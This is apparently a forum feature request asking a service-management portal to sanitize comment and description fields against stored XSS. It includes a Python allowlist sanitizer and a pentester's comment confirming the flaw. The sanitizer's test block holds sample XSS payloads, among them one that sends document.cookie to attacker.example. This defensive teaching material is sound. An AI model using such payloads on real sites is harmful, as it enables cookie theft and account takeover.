Sanitize Text Fields to Protect Against XSS Attacks
HTML tags are very useful in the portal, but currently the portal is vulnerable to persistent cross-site scripting (pXSS) and other XSS attacks by anyone who can access the portal, specifically through comments, descriptions and other text fields.
With this vulnerability, an insider could perform pXSS to do a variety of malicious actions. These actions could include denial of service, malvertising, and malware redirection.
Please update the portal to sanitize user input fields prior to committing them to SCSM.
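As an added worked example (not Cireson's code; the portal is a .NET application, so this is Python purely to show the technique), here is the shape of the sanitization the request asks for: an allowlist-based HTML sanitizer run over a field before it is committed to SCSM. The tag, attribute and URL-scheme allowlists are assumptions and would be tuned to what the portal actually needs to render; everything not on them, including `<script>` blocks, `on*` event handlers and `javascript:` URLs, is removed, and any text that survives is re-encoded on the way out.

```python
"""Allowlist HTML sanitizer for rich-text fields (comments, descriptions).

Added example, not Cireson code. Everything not explicitly allowed (tags,
attributes, URL schemes) is dropped, and surviving text is re-encoded.
"""
import re
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hypothetical allowlists; tune them to what the portal needs to render.
ALLOWED_TAGS = {"p", "br", "b", "i", "u", "strong", "em", "ul", "ol", "li",
                "a", "code", "pre", "blockquote"}
ALLOWED_ATTRS = {"a": {"href", "title"}}
VOID_TAGS = {"br"}
DROP_WITH_CONTENT = {"script", "style"}   # tag *and* its text are discarded
SAFE_URL_SCHEMES = {"http", "https", "mailto"}


def safe_url(value):
    """True if the URL is relative (no scheme) or uses an allowlisted scheme.

    Browsers ignore tabs, newlines and other C0 controls inside a scheme
    ("java\\tscript:"), so they are removed before the scheme is inspected.
    """
    cleaned = re.sub(r"[\x00-\x20]", "", value)
    scheme = urlparse(cleaned).scheme.lower()
    return scheme == "" or scheme in SAFE_URL_SCHEMES


class AllowlistSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)  # entities arrive decoded
        self.out = []          # output fragments
        self.open_tags = []    # stack of allowed tags still open
        self.skip_depth = 0    # >0 while inside <script>/<style>

    def handle_starttag(self, tag, attrs):
        if tag in DROP_WITH_CONTENT:
            self.skip_depth += 1
            return
        if self.skip_depth or tag not in ALLOWED_TAGS:
            return                       # drop the tag, keep its text
        pieces = [tag]
        for name, value in attrs:        # names are already lower-cased
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue                 # drops every on* handler, style, etc.
            value = value or ""
            if name == "href" and not safe_url(value):
                continue                 # javascript:, data:, vbscript: ...
            pieces.append(f'{name}="{escape(value, quote=True)}"')
        self.out.append("<" + " ".join(pieces) + ">")
        if tag not in VOID_TAGS:
            self.open_tags.append(tag)

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)
        if tag not in VOID_TAGS:
            self.handle_endtag(tag)

    def handle_endtag(self, tag):
        if tag in DROP_WITH_CONTENT:
            self.skip_depth = max(0, self.skip_depth - 1)
            return
        if self.skip_depth or tag not in self.open_tags:
            return                       # stray or disallowed closing tag
        while self.open_tags:            # close anything left open inside it
            opened = self.open_tags.pop()
            self.out.append(f"</{opened}>")
            if opened == tag:
                break

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(escape(data, quote=False))  # re-encode text

    # Comments, <!DOCTYPE>, <?pi?> and unknown declarations fall through to
    # HTMLParser's no-op handlers and are therefore dropped.

    def result(self):
        self.close()
        while self.open_tags:            # balance whatever the input left open
            self.out.append(f"</{self.open_tags.pop()}>")
        return "".join(self.out)


def sanitize_html(fragment):
    """Return a version of `fragment` containing only allowlisted markup."""
    parser = AllowlistSanitizer()
    parser.feed(fragment)
    return parser.result()


if __name__ == "__main__":
    # Constructed sample payloads of the kind a malicious insider could post.
    for sample in (
        '<b>Status</b> <script>alert(document.cookie)</script>',
        '<img src=x onerror="fetch(\'//attacker.example/\'+document.cookie)">',
        '<a href="javascript:alert(1)" onclick="alert(2)">ticket</a>',
        '<a href="https://example.com/kb?id=1&amp;v=2">KB article</a>',
    ):
        print(repr(sanitize_html(sample)))
```

Two caveats a practitioner would attach to the request: sanitizing on write is the fix asked for, but anything already stored stays dangerous until it is re-sanitized, and the portal should still HTML-encode at render time as a second layer. The sanitizer must be built on a real HTML tokenizer (as above) or a maintained library for the platform, never on regular expressions, because browsers decode entities, ignore control characters in schemes and tolerate malformed tags in ways a regex will not anticipate.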
Comments
Our penetration testers identified this 'stored XSS' vulnerability, too. Not nice 😕